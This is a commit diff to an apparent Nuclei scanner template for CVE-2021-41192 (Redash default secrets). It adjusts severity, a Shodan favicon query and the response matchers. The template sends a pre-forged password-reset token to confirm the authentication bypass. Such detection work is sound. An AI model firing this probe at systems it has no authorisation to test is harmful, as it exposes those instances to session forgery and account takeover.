Update CVE-2021-41192.yaml

patch-1
Prince Chaddha 2022-02-27 02:27:18 +05:30 committed by GitHub
parent dde0b0f394
commit 04ae5b2e4d
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 8 additions and 3 deletions

View File

@ -3,14 +3,14 @@ id: CVE-2021-41192
info: info:
name: Redash Setup Configuration - Default secrets name: Redash Setup Configuration - Default secrets
author: bananabr author: bananabr
severity: critical severity: high
description: If an admin sets up Redash versions <=10.0 and prior without explicitly specifying the `REDASH_COOKIE_SECRET` or `REDASH_SECRET_KEY` environment variables, a default value is used for both that is the same across all installations. In such cases, the instance is vulnerable to attackers being able to forge sessions using the known default value. description: If an admin sets up Redash versions <=10.0 and prior without explicitly specifying the `REDASH_COOKIE_SECRET` or `REDASH_SECRET_KEY` environment variables, a default value is used for both that is the same across all installations. In such cases, the instance is vulnerable to attackers being able to forge sessions using the known default value.
reference: reference:
- https://hackerone.com/reports/1380121 - https://hackerone.com/reports/1380121
- https://github.com/getredash/redash/security/advisories/GHSA-g8xr-f424-h2rv - https://github.com/getredash/redash/security/advisories/GHSA-g8xr-f424-h2rv
- https://nvd.nist.gov/vuln/detail/CVE-2021-41192 - https://nvd.nist.gov/vuln/detail/CVE-2021-41192
metadata: metadata:
shodan-query: http.favicon.hash:247321068 shodan-query: http.favicon.hash:698624197
tags: cve,cve2021,redash,auth-bypass tags: cve,cve2021,redash,auth-bypass
requests: requests:
@ -18,12 +18,17 @@ requests:
path: path:
- "{{BaseURL}}/reset/IjEi.YhAmmQ.cdQp7CnnVq02aQ05y8tSBddl-qs" - "{{BaseURL}}/reset/IjEi.YhAmmQ.cdQp7CnnVq02aQ05y8tSBddl-qs"
- "{{BaseURL}}/redash/reset/IjEi.YhAmmQ.cdQp7CnnVq02aQ05y8tSBddl-qs" - "{{BaseURL}}/redash/reset/IjEi.YhAmmQ.cdQp7CnnVq02aQ05y8tSBddl-qs"
stop-at-first-match: true stop-at-first-match: true
matchers-condition: and matchers-condition: and
matchers: matchers:
- type: word - type: word
part: body
words: words:
- "password" - "Enter your new password:"
- "redash"
condition: and
- type: status - type: status
status: status:
- 200 - 200